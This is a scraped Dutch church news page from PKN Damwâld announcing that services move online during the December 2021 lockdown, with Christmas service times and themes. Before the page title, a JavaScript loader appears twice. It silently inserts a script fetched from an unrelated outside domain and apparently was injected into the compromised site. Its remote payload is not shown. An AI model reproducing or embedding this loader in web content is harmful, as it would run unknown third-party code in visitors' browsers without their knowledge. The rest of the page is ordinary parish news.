;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerk & corona ... Laatste nieuws ! - PKN Damwâld

Kerk & corona … Laatste nieuws !

Gepubliceerd op: zondag 19 december 2021

U heeft zaterdagavond de persconferentie gezien en gehoord, we gaan in totale lockdown. Dit heeft ook consequenties voor onze kerkdiensten. Met ingang van zondag 19 december zullen die helaas alleen online te volgen zijn. De kerk is dus dicht voor bezoekers. Heel jammer, maar het is niet anders. Ook de oppas en andere jeugd activiteiten stoppen per direct. Ondanks alle vervelende coronamaatregelen zitten we wel in de kerstperiode. Een tijd van licht en hoop op betere tijden. We hebben de online kerstdiensten – zie de Klok en Ús Tsjerkenijs – en mogen nog steeds naar elkaar omkijken. Laten we dat ook doen. Ook hebben we onze Heer die naar ons omziet, ons sterkt en troost geeft. Dat is een goede gedachte om vast te houden.  Ondanks alle beperkingen die er zijn, heel fijne kerstdagen toegewenst.

Bijbeluurtje Nij Tjaerda
Helaas kan het Bijbeluurtje in Nij Tjaerda niet doorgaan. Vanwege de maatregelen en de besmettingscijfers kan in deze maand niets georganiseerd worden in Nij Tjaerda. We wensen alle bewoners veel sterkte nu opnieuw in de decembermaand geen bijeenkomsten zijn.

Vrijdag 24 december kerstnachtdienst: 21.00 uur voorganger is Robert Colijn en m.m.v. delegatie van brasband “Ere zij God”.
Het thema is: Geef Licht. Kerst zit vol licht, maar is dit nou wel waar kerst om gaat? Het gaat om die baby, maar wat zegt die baby ons persoonlijk?

De dienst is alleen online te volgen. Vanaf 20.45 uur is er al mooie muziek te beluisteren. We hopen op een mooie en inspirerende online kerstnachtdienst. Dus met een hapje en een drankje hard meezingen met de mooie kerstliederen! Iedereen is welkom! Kijk mee en nodig ook vrienden, bekenden en buren uit om in hun eigen huis aan te sluiten bij de kerstnachtdienst van dit jaar.

Zaterdag 25 december 1e kerstdag: 9.30 uur ds. G. Otter

Eerste kerstdag wordt een afwisselende dienst, die mee voorbereid is door de Bernetsjerke en Kingkids. Verschillende kinderen zullen een bijdrage hebben. De dienst kun je live in de kerk en via de livestream volgen.

Zondag 26 december: Interkerkelijke Kerstviering op 2e Kerstdag om 9.30 uur

In verband met de geldende coronamaatregelen kan de dienst niet in de sporthal worden gehouden. Het wordt dit jaar een onlinedienst vanuit De Ontmoeting. De Evangelisatiecommissie heeft de dienst samen met ds. G.J. Otter voorbereid. Het thema is: “licht in donkere tijden”. Medewerking wordt verleend door het blazersensemble van de Brassband “Ere zij God “. Graag nodigen wij u uit om deze dienst “online “te volgen. Inloggen: PKN Damwald.nl/live

N.B.  Voorlopig zijn alle diensten alleen online te volgen via www.pkndamwald.nl en de kerkradio (Kabelnoord kanaal 1956).